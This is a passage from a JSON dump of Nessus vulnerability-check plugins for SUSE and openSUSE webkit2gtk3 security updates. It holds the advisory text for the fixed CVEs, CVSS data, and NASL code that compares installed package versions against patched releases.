"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2019-309.NASL", "href": "https://www.tenable.com/plugins/nessus/122745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-309.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122745);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-309)\");\n script_summary(english:\"Check for the openSUSE-2019-309 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2019-6212: Fixed multiple memory corruption\n vulnerabilities which could allow arbitrary code\n execution during the processing of special crafted\n web-content.\n\n - CVE-2019-6215: Fixed a type confusion vulnerability\n which could allow arbitrary code execution during the\n processing of special crafted web-content.\n\n - CVE-2019-6216: Fixed multiple memory corruption\n vulnerabilities which could allow arbitrary code\n execution during the processing of special crafted\n web-content. \n\n - CVE-2019-6217: Fixed multiple memory corruption\n vulnerabilities which could allow arbitrary code\n execution during the processing of special crafted\n web-content. \n\n - CVE-2019-6226: Fixed multiple memory corruption\n vulnerabilities which could allow arbitrary code\n execution during the processing of special crafted\n web-content. \n\n - CVE-2019-6227: Fixed a memory corruption vulnerability\n which could allow arbitrary code execution during the\n processing of special crafted web-content.\n\n - CVE-2019-6229: Fixed a logic issue by improving\n validation which could allow arbitrary code execution\n during the processing of special crafted web-content.\n\n - CVE-2019-6233: Fixed a memory corruption vulnerability\n which could allow arbitrary code execution during the\n processing of special crafted web-content.\n\n - CVE-2019-6234: Fixed a memory corruption vulnerability\n which could allow arbitrary code execution during the\n processing of special crafted web-content.\n\nOther issues addressed :\n\n - Update to version 2.22.6 (bsc#1124937).\n\n - Kinetic scrolling slow down smoothly when reaching the\n ends of pages, instead of abruptly, to better match the\n GTK+ behaviour.\n\n - Fixed Web inspector magnifier under Wayland.\n\n - Fixed garbled rendering of some websites (e.g. YouTube)\n while scrolling under X11.\n\n - Fixed several crashes, race conditions, and rendering\n issues.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124937\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.6-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.22.6-21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:32", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6212: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6215: Fixed a type confusion vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6216: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6217: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6226: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6227: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6229: Fixed a logic issue by improving validation which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6233: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\nCVE-2019-6234: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\nOther issues addressed: Update to version 2.22.6 (bsc#1124937).\n\nKinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\nFixed Web inspector magnifier under Wayland.\n\nFixed garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\nFixed several crashes, race conditions, and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-01T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0511-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2019-0511-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122531", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0511-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122531);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0511-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2019-6212: Fixed multiple memory corruption vulnerabilities which\ncould allow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6215: Fixed a type confusion vulnerability which could allow\narbitrary code execution during the processing of special crafted\nweb-content.\n\nCVE-2019-6216: Fixed multiple memory corruption vulnerabilities which\ncould allow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6217: Fixed multiple memory corruption vulnerabilities which\ncould allow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6226: Fixed multiple memory corruption vulnerabilities which\ncould allow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6227: Fixed a memory corruption vulnerability which could\nallow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6229: Fixed a logic issue by improving validation which could\nallow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6233: Fixed a memory corruption vulnerability which could\nallow arbitrary code execution during the processing of special\ncrafted web-content.\n\nCVE-2019-6234: Fixed a memory corruption vulnerability which could\nallow arbitrary code execution during the processing of special\ncrafted web-content.\n\nOther issues addressed: Update to version 2.22.6 (bsc#1124937).\n\nKinetic scrolling slow down smoothly when reaching the ends of pages,\ninstead of abruptly, to better match the GTK+ behaviour.\n\nFixed Web inspector magnifier under Wayland.\n\nFixed garbled rendering of some websites (e.g. YouTube) while\nscrolling under X11.\n\nFixed several crashes, race conditions, and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1124937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6216/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6217/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6234/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190511-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a90e20aa\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-511=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP4:zypper in -t patch\nSUSE-SLE-WE-12-SP4-2019-511=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2019-511=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2019-511=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2019-511=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-511=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-511=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-511=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-511=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-511=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-511=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-511=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-511=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-devel-2.22.6-2.35.1\")) flag++;\nif 